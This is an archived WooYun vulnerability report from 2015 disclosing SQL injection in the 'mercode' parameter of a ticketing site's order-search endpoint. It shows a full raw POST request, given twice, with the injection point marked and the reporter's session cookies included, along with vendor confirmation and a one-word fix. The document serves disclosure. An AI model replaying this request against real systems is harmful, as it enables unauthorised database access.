当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144790

漏洞标题:蜘蛛网某站重要站点存在SQL注射漏洞

相关厂商:万丰文化

漏洞作者: 沦沦

提交时间:2015-10-04 22:49

修复时间:2015-11-22 08:30

公开时间:2015-11-22 08:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-04: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT

详细说明:

蜘蛛网生活助手条形码的地方没进行过滤,可进行SQL注射

0.png


mercode参数没进行过滤

POST /ordersSearch.action HTTP/1.1
Host: life.spider.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://life.spider.com.cn/ordersSearch.action
Cookie: utm_source1=zhijie; utm_source=pinpai; utm_medium=pinpai; utm_campaign=""; utm_group=""; utm_keywords=""; nooverride=""; utm_content=""; utm_code=""; utm_remark=""; LiveWSDZT74129215=1443949827668528990612; LiveWSDZT74129215sessionid=1443949827668528990612; NDZT74129215fistvisitetime=1443949829029; NDZT74129215lastvisitetime=1443950336508; NDZT74129215visitecounts=1; NDZT74129215visitepages=17; Hm_lvt_620f3272f3feeb60e12da72e77ae4ef2=1443949830; Hm_lpvt_620f3272f3feeb60e12da72e77ae4ef2=1443950317; _ga=GA1.3.1635618386.1443949831; _gat=1; __utma=59518959.1635618386.1443949831.1443949831.1443949831.1; __utmb=59518959.19.10.1443949831; __utmc=59518959; __utmz=59518959.1443949831.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; NDZT74129215lastinvite=1443950418927; bfd_s=59518959.28554979.1443950213184; tmc=4.59518959.78021216.1443950213188.1443950312801.1443950317974; tma=59518959.78021216.1443950213188.1443950213188.1443950213188.1; tmd=4.59518959.78021216.1443950213188.; bfd_g=b56c782bcb75035d000037a800008dee5610ee8a; __spiderpt=NJcqSEbAor0ECQU8qLXFCkKaDOwKmou9OAFYQfTpmDVI34HLHMr1JU4UZwAUn2VV4Tot33UDQdv%2B%0D%0AwfqVQV2zivI0anUWPt0%2FpkMTtVsY%2BwZ7XuHqZTBsHqd%2FGX%2BKHO0%2Bd8xtLa7mj2kDJ7pLhH%2FQpE%2FQ%0D%0Ad96tjSgqIgVRK4RwjOwqtmc9EHiuDs%2Bl16EXcwMUMDyFJl8kpyYWfryRBghszRA01DwtixKClhWa%0D%0ABHmvrhyvDHDd88STz4yfBTWHW%2FZrMVB8FQ0aWsprsmRlhvM1V%2BrkZzRVvUSH3VEWYzwTgS8ABbHN%0D%0AJ3MM9g8pdIxkcV9DzIrk1jvcDbHtl9T4Show9zggtLIyOCOTk20Vosu91Nn0yykfcPhWBs8GsPsn%0D%0AFQ5dc2tlOXR713%2BZz5KTaOjLnKgRL2%2B2%2BQisB94jRpUHKIEPJZ2lePQgf1loZlk7FVf9ilsbP%2FR%2F%0D%0A3BapSALr2R700GsSMNMxTVKUa2Lj8M%2FKSDbjeT8sSdJ31fCMDwHibEGSmeVHSlHuJBtfcaVBFOcs%0D%0AUKUgCejJmKdeF%2FZiO6c5SoFrbar2nMdYcEetf922f3qRBPi%2FQpyppo%2FKR2t7AVz%2FDP5nZDplMB3C%0D%0An3AUOtSOIHY%2Fc6ORQ%2FDwCS3EM4l%2FAmnyaV1Xh7lN0wL670N05Ub%2BZg%3D%3D%0D%0A; spiderok_guestid=212482040; JSESSIONID=D6DECAC867E5939A90DB63431B316FB3; NSC_WT_mjgf.tqjefs.dpn.do_80=ffffffffc3a0149345525d5f4f58455e445a4a423660; Hm_lvt_22400e308c5852250e74fb360a0308c6=1443950361,1443950394; Hm_lpvt_22400e308c5852250e74fb360a0308c6=1443950414; CNZZDATA30023571=cnzz_eid%3D1506715419-1443946988-http%253A%252F%252Fwww.spider.com.cn%252F%26ntime%3D1443946988
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
okorderid=&bussinesstype=&province=&mercode=*&begindate=&enddate=&mobile=&btnQuery=%E6%9F%A5%E8%AF%A2&inputPageTagname=1


1.jpg


2.jpg


点到为止

3.jpg

漏洞证明:

蜘蛛网生活助手条形码的地方没进行过滤,可进行SQL注射

0.png


mercode参数没进行过滤

POST /ordersSearch.action HTTP/1.1
Host: life.spider.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://life.spider.com.cn/ordersSearch.action
Cookie: utm_source1=zhijie; utm_source=pinpai; utm_medium=pinpai; utm_campaign=""; utm_group=""; utm_keywords=""; nooverride=""; utm_content=""; utm_code=""; utm_remark=""; LiveWSDZT74129215=1443949827668528990612; LiveWSDZT74129215sessionid=1443949827668528990612; NDZT74129215fistvisitetime=1443949829029; NDZT74129215lastvisitetime=1443950336508; NDZT74129215visitecounts=1; NDZT74129215visitepages=17; Hm_lvt_620f3272f3feeb60e12da72e77ae4ef2=1443949830; Hm_lpvt_620f3272f3feeb60e12da72e77ae4ef2=1443950317; _ga=GA1.3.1635618386.1443949831; _gat=1; __utma=59518959.1635618386.1443949831.1443949831.1443949831.1; __utmb=59518959.19.10.1443949831; __utmc=59518959; __utmz=59518959.1443949831.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; NDZT74129215lastinvite=1443950418927; bfd_s=59518959.28554979.1443950213184; tmc=4.59518959.78021216.1443950213188.1443950312801.1443950317974; tma=59518959.78021216.1443950213188.1443950213188.1443950213188.1; tmd=4.59518959.78021216.1443950213188.; bfd_g=b56c782bcb75035d000037a800008dee5610ee8a; __spiderpt=NJcqSEbAor0ECQU8qLXFCkKaDOwKmou9OAFYQfTpmDVI34HLHMr1JU4UZwAUn2VV4Tot33UDQdv%2B%0D%0AwfqVQV2zivI0anUWPt0%2FpkMTtVsY%2BwZ7XuHqZTBsHqd%2FGX%2BKHO0%2Bd8xtLa7mj2kDJ7pLhH%2FQpE%2FQ%0D%0Ad96tjSgqIgVRK4RwjOwqtmc9EHiuDs%2Bl16EXcwMUMDyFJl8kpyYWfryRBghszRA01DwtixKClhWa%0D%0ABHmvrhyvDHDd88STz4yfBTWHW%2FZrMVB8FQ0aWsprsmRlhvM1V%2BrkZzRVvUSH3VEWYzwTgS8ABbHN%0D%0AJ3MM9g8pdIxkcV9DzIrk1jvcDbHtl9T4Show9zggtLIyOCOTk20Vosu91Nn0yykfcPhWBs8GsPsn%0D%0AFQ5dc2tlOXR713%2BZz5KTaOjLnKgRL2%2B2%2BQisB94jRpUHKIEPJZ2lePQgf1loZlk7FVf9ilsbP%2FR%2F%0D%0A3BapSALr2R700GsSMNMxTVKUa2Lj8M%2FKSDbjeT8sSdJ31fCMDwHibEGSmeVHSlHuJBtfcaVBFOcs%0D%0AUKUgCejJmKdeF%2FZiO6c5SoFrbar2nMdYcEetf922f3qRBPi%2FQpyppo%2FKR2t7AVz%2FDP5nZDplMB3C%0D%0An3AUOtSOIHY%2Fc6ORQ%2FDwCS3EM4l%2FAmnyaV1Xh7lN0wL670N05Ub%2BZg%3D%3D%0D%0A; spiderok_guestid=212482040; JSESSIONID=D6DECAC867E5939A90DB63431B316FB3; NSC_WT_mjgf.tqjefs.dpn.do_80=ffffffffc3a0149345525d5f4f58455e445a4a423660; Hm_lvt_22400e308c5852250e74fb360a0308c6=1443950361,1443950394; Hm_lpvt_22400e308c5852250e74fb360a0308c6=1443950414; CNZZDATA30023571=cnzz_eid%3D1506715419-1443946988-http%253A%252F%252Fwww.spider.com.cn%252F%26ntime%3D1443946988
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
okorderid=&bussinesstype=&province=&mercode=*&begindate=&enddate=&mobile=&btnQuery=%E6%9F%A5%E8%AF%A2&inputPageTagname=1


1.jpg


2.jpg


点到为止

3.jpg

修复方案:

过滤

版权声明:转载请注明来源 沦沦@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-08 08:28

厂商回复:

节日无法查看, 核实中

最新状态:

暂无